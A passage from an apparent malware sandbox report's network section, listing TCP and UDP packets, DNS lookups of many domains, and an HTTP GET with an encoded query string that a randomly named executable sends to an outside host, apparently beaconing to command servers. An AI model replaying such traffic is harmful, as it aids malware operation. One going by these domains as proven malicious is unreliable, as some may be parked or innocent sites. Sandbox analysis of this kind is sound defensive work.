                                                          Sep 11, 2024 22:05:10.877726078 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877737045 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877748966 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.877753019 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:10.877753019 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:10.877800941 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:10.877800941 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:10.882621050 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.882661104 CEST8049739198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:10.882716894 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:11.582335949 CEST4973980192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:12.599901915 CEST4974080192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:12.605835915 CEST8049740198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:12.605937958 CEST4974080192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:12.608148098 CEST4974080192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:12.613109112 CEST8049740198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:13.260107994 CEST8049740198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:13.260130882 CEST8049740198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:13.260345936 CEST4974080192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:13.262917042 CEST4974080192.168.2.10198.12.241.35
                                                          Sep 11, 2024 22:05:13.268856049 CEST8049740198.12.241.35192.168.2.10
                                                          Sep 11, 2024 22:05:18.321466923 CEST4974180192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:18.326461077 CEST804974191.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:18.326577902 CEST4974180192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:18.328668118 CEST4974180192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:18.333600998 CEST804974191.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:18.997102976 CEST804974191.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:18.997261047 CEST804974191.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:18.997419119 CEST4974180192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:19.833087921 CEST4974180192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:20.850055933 CEST4974280192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:20.855038881 CEST804974291.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:20.855110884 CEST4974280192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:20.858273983 CEST4974280192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:20.863188982 CEST804974291.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:21.677721024 CEST804974291.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:21.677777052 CEST804974291.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:21.677864075 CEST4974280192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:21.677923918 CEST804974291.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:21.679038048 CEST4974280192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:22.362243891 CEST4974280192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:23.380918980 CEST4974380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:23.386450052 CEST804974391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:23.386571884 CEST4974380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:23.389415026 CEST4974380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:23.394505978 CEST804974391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:23.395087004 CEST804974391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:24.030232906 CEST804974391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:24.030251980 CEST804974391.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:24.030303955 CEST4974380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:24.893573999 CEST4974380192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:25.912885904 CEST4974480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:25.919032097 CEST804974491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:25.919281960 CEST4974480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:25.921297073 CEST4974480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:25.927673101 CEST804974491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:26.772846937 CEST804974491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:26.772876024 CEST804974491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:26.772934914 CEST804974491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:26.773020983 CEST4974480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:26.775959969 CEST4974480192.168.2.1091.195.240.19
                                                          Sep 11, 2024 22:05:26.780828953 CEST804974491.195.240.19192.168.2.10
                                                          Sep 11, 2024 22:05:40.282619953 CEST4974580192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:40.287647963 CEST804974531.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:40.287725925 CEST4974580192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:40.290369987 CEST4974580192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:40.295187950 CEST804974531.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:41.799820900 CEST4974580192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:41.868355036 CEST804974531.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:42.819180012 CEST4974680192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:43.467567921 CEST804974631.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:43.468213081 CEST4974680192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:43.470554113 CEST4974680192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:43.475490093 CEST804974631.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:44.974967957 CEST4974680192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:45.020184994 CEST804974631.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:45.990201950 CEST4974780192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:45.995296001 CEST804974731.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:45.995378017 CEST4974780192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:45.997519970 CEST4974780192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:46.002389908 CEST804974731.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:46.002438068 CEST804974731.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:47.502943993 CEST4974780192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:47.553359985 CEST804974731.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:48.525665045 CEST4974880192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:48.530702114 CEST804974831.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:05:48.530797958 CEST4974880192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:48.539350033 CEST4974880192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:05:48.544197083 CEST804974831.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:06:01.797087908 CEST804974531.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:06:01.797274113 CEST4974580192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:06:04.859477997 CEST804974631.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:06:04.859536886 CEST4974680192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:06:07.385147095 CEST804974731.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:06:07.385246992 CEST4974780192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:06:09.901204109 CEST804974831.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:06:09.903189898 CEST4974880192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:06:09.907006979 CEST4974880192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:06:10.132411957 CEST804974831.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:06:10.132474899 CEST4974880192.168.2.1031.186.11.254
                                                          Sep 11, 2024 22:06:10.134934902 CEST804974831.186.11.254192.168.2.10
                                                          Sep 11, 2024 22:06:15.001880884 CEST4974980192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:15.006834030 CEST8049749192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:15.006923914 CEST4974980192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:15.009797096 CEST4974980192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:15.014739990 CEST8049749192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:15.495182037 CEST8049749192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:15.495198965 CEST8049749192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:15.495255947 CEST8049749192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:15.495299101 CEST4974980192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:15.495496988 CEST4974980192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:17.112900019 CEST4974980192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:18.130786896 CEST4975080192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:18.135761023 CEST8049750192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:18.135865927 CEST4975080192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:18.137933016 CEST4975080192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:18.142844915 CEST8049750192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:18.792932034 CEST8049750192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:18.792953014 CEST8049750192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:18.792968035 CEST8049750192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:18.793021917 CEST4975080192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:18.793083906 CEST8049750192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:18.793210030 CEST4975080192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:19.643626928 CEST4975080192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:20.661956072 CEST4975180192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:20.667211056 CEST8049751192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:20.667315006 CEST4975180192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:20.669379950 CEST4975180192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:20.674293995 CEST8049751192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:20.674617052 CEST8049751192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:21.178412914 CEST8049751192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:21.178430080 CEST8049751192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:21.178493977 CEST4975180192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:21.178735971 CEST8049751192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:21.178797007 CEST4975180192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:22.174899101 CEST4975180192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.193321943 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.198278904 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.198362112 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.200354099 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.205152035 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.711595058 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.712097883 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.712110996 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.712219000 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.712264061 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.714905977 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.720269918 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:29.472975016 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:29.478352070 CEST804975347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:29.478456974 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:29.481215954 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:29.486073971 CEST804975347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:30.426184893 CEST804975347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:30.426208973 CEST804975347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:30.426318884 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:30.989314079 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:32.005902052 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:32.011015892 CEST804975447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:32.013086081 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:32.013145924 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:32.018007040 CEST804975447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:32.913976908 CEST804975447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:32.914096117 CEST804975447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:32.914154053 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:33.518467903 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:34.537472010 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:34.542453051 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:34.542570114 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:34.544626951 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:34.549485922 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:34.549679041 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:35.474220991 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:35.474329948 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:35.474379063 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:36.049834967 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.068394899 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.073309898 CEST804975647.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:37.073419094 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.075231075 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.080030918 CEST804975647.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:37.962395906 CEST804975647.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:37.962440968 CEST804975647.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:37.962677956 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.965822935 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.970813036 CEST804975647.239.13.172192.168.2.10

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 11, 2024 22:02:43.686266899 CEST6207153192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:02:43.858624935 CEST53620711.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:02:48.866895914 CEST5435753192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:02:48.987761974 CEST53543571.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:03:04.693380117 CEST5721053192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:03:04.987855911 CEST53572101.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:03:18.663373947 CEST6469853192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:03:19.288121939 CEST53646981.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:03:32.865890980 CEST6050853192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:03:33.546483994 CEST53605081.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:03:47.178591967 CEST5475753192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:03:47.890587091 CEST53547571.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:04:01.414809942 CEST6195953192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:04:02.424536943 CEST6195953192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:04:02.791366100 CEST53619591.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:04:02.791388988 CEST53619591.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:04:36.788104057 CEST5428953192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:04:37.390281916 CEST53542891.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:04:50.929626942 CEST5768253192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:04:50.955427885 CEST53576821.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:05:04.241656065 CEST5810153192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:05:04.710949898 CEST53581011.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:05:18.272358894 CEST5972453192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:05:18.318931103 CEST53597241.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:05:31.790961027 CEST4984853192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:05:32.065623045 CEST53498481.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:05:40.132844925 CEST5655953192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:05:40.273622990 CEST53565591.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:06:14.912861109 CEST5901353192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:06:14.981918097 CEST53590131.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:06:28.725085020 CEST5019053192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:06:29.470614910 CEST53501901.1.1.1192.168.2.10
                                                          Sep 11, 2024 22:06:42.987001896 CEST5129653192.168.2.101.1.1.1
                                                          Sep 11, 2024 22:06:43.064589024 CEST53512961.1.1.1192.168.2.10

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Sep 11, 2024 22:02:43.686266899 CEST192.168.2.101.1.1.10x3788Standard query (0)www.make-l.ruA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:02:48.866895914 CEST192.168.2.101.1.1.10xf010Standard query (0)www.goodgiftguru.comA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:03:04.693380117 CEST192.168.2.101.1.1.10x362cStandard query (0)www.fardvuss.topA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:03:18.663373947 CEST192.168.2.101.1.1.10x8734Standard query (0)www.vacaturecast.comA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:03:32.865890980 CEST192.168.2.101.1.1.10xb039Standard query (0)www.drivemktg.coA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:03:47.178591967 CEST192.168.2.101.1.1.10x5070Standard query (0)www.nbh6agr8h.sbsA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:04:01.414809942 CEST192.168.2.101.1.1.10xfd4aStandard query (0)www.54bxd.cyouA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:04:02.424536943 CEST192.168.2.101.1.1.10xfd4aStandard query (0)www.54bxd.cyouA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:04:36.788104057 CEST192.168.2.101.1.1.10x4bbStandard query (0)www.r7xzr3ib0.sbsA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:04:50.929626942 CEST192.168.2.101.1.1.10xac4fStandard query (0)www.bitmapsportsbook.comA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:05:04.241656065 CEST192.168.2.101.1.1.10xbe75Standard query (0)www.aceautocorp.comA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:05:18.272358894 CEST192.168.2.101.1.1.10x4fcdStandard query (0)www.purpleheartlacey.comA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:05:31.790961027 CEST192.168.2.101.1.1.10xcf93Standard query (0)www.cityrentsatruck.comA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:05:40.132844925 CEST192.168.2.101.1.1.10x3d96Standard query (0)www.grafiktema.xyzA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:06:14.912861109 CEST192.168.2.101.1.1.10xd383Standard query (0)www.cr-pos.comA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:06:28.725085020 CEST192.168.2.101.1.1.10xcaa3Standard query (0)www.trcrb8e8m.sbsA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:06:42.987001896 CEST192.168.2.101.1.1.10x32c0Standard query (0)www.sulpapeis.onlineA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Sep 11, 2024 22:02:43.858624935 CEST1.1.1.1192.168.2.100x3788Name error (3)www.make-l.runonenoneA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:02:48.987761974 CEST1.1.1.1192.168.2.100xf010No error (0)www.goodgiftguru.comwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:02:48.987761974 CEST1.1.1.1192.168.2.100xf010No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:03:04.987855911 CEST1.1.1.1192.168.2.100x362cNo error (0)www.fardvuss.top199.192.19.19A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:03:19.288121939 CEST1.1.1.1192.168.2.100x8734No error (0)www.vacaturecast.comvacaturecast.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:03:19.288121939 CEST1.1.1.1192.168.2.100x8734No error (0)vacaturecast.com91.184.0.111A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:03:33.546483994 CEST1.1.1.1192.168.2.100xb039No error (0)www.drivemktg.co193.108.130.23A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:03:47.890587091 CEST1.1.1.1192.168.2.100x5070No error (0)www.nbh6agr8h.sbsxiaoyue.zhuangkou.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:03:47.890587091 CEST1.1.1.1192.168.2.100x5070No error (0)xiaoyue.zhuangkou.com47.239.13.172A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:04:02.791366100 CEST1.1.1.1192.168.2.100xfd4aNo error (0)www.54bxd.cyou154.213.157.32A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:04:02.791388988 CEST1.1.1.1192.168.2.100xfd4aNo error (0)www.54bxd.cyou154.213.157.32A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:04:37.390281916 CEST1.1.1.1192.168.2.100x4bbNo error (0)www.r7xzr3ib0.sbsxiaoyue.zhuangkou.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:04:37.390281916 CEST1.1.1.1192.168.2.100x4bbNo error (0)xiaoyue.zhuangkou.com47.239.13.172A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:04:50.955427885 CEST1.1.1.1192.168.2.100xac4fNo error (0)www.bitmapsportsbook.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:04:50.955427885 CEST1.1.1.1192.168.2.100xac4fNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:05:04.710949898 CEST1.1.1.1192.168.2.100xbe75No error (0)www.aceautocorp.comaceautocorp.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:05:04.710949898 CEST1.1.1.1192.168.2.100xbe75No error (0)aceautocorp.com198.12.241.35A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:05:18.318931103 CEST1.1.1.1192.168.2.100x4fcdNo error (0)www.purpleheartlacey.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:05:18.318931103 CEST1.1.1.1192.168.2.100x4fcdNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:05:32.065623045 CEST1.1.1.1192.168.2.100xcf93Name error (3)www.cityrentsatruck.comnonenoneA (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:05:40.273622990 CEST1.1.1.1192.168.2.100x3d96No error (0)www.grafiktema.xyzgrafiktema.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:05:40.273622990 CEST1.1.1.1192.168.2.100x3d96No error (0)grafiktema.xyz31.186.11.254A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:06:14.981918097 CEST1.1.1.1192.168.2.100xd383No error (0)www.cr-pos.comcr-pos.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:06:14.981918097 CEST1.1.1.1192.168.2.100xd383No error (0)cr-pos.com192.250.231.28A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:06:29.470614910 CEST1.1.1.1192.168.2.100xcaa3No error (0)www.trcrb8e8m.sbsxiaoyue.zhuangkou.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 11, 2024 22:06:29.470614910 CEST1.1.1.1192.168.2.100xcaa3No error (0)xiaoyue.zhuangkou.com47.239.13.172A (IP address)IN (0x0001)false
                                                          Sep 11, 2024 22:06:43.064589024 CEST1.1.1.1192.168.2.100x32c0No error (0)www.sulpapeis.onlinesulpapeis.onlineCNAME (Canonical name)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.goodgiftguru.com
                                                          • www.fardvuss.top
                                                          • www.vacaturecast.com
                                                          • www.drivemktg.co
                                                          • www.nbh6agr8h.sbs
                                                          • www.54bxd.cyou
                                                          • www.r7xzr3ib0.sbs
                                                          • www.bitmapsportsbook.com
                                                          • www.aceautocorp.com
                                                          • www.purpleheartlacey.com
                                                          • www.grafiktema.xyz
                                                          • www.cr-pos.com
                                                          • www.trcrb8e8m.sbs

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.1049707217.70.184.50804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:02:49.001437902 CEST463OUTGET /p2ly/?bFGXGTdX=854srIWxIbaR7EG2BVBjn1PfwNbGMwTqcAT48G/3DKSB08gEc85mKKLIvkpoComultp7rI80f5482EKJDc++UJ/X9hbLrPJpiCWZeROTRI35j/SOzA==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.goodgiftguru.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:02:49.639590025 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:02:49 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Vary: Accept-Language
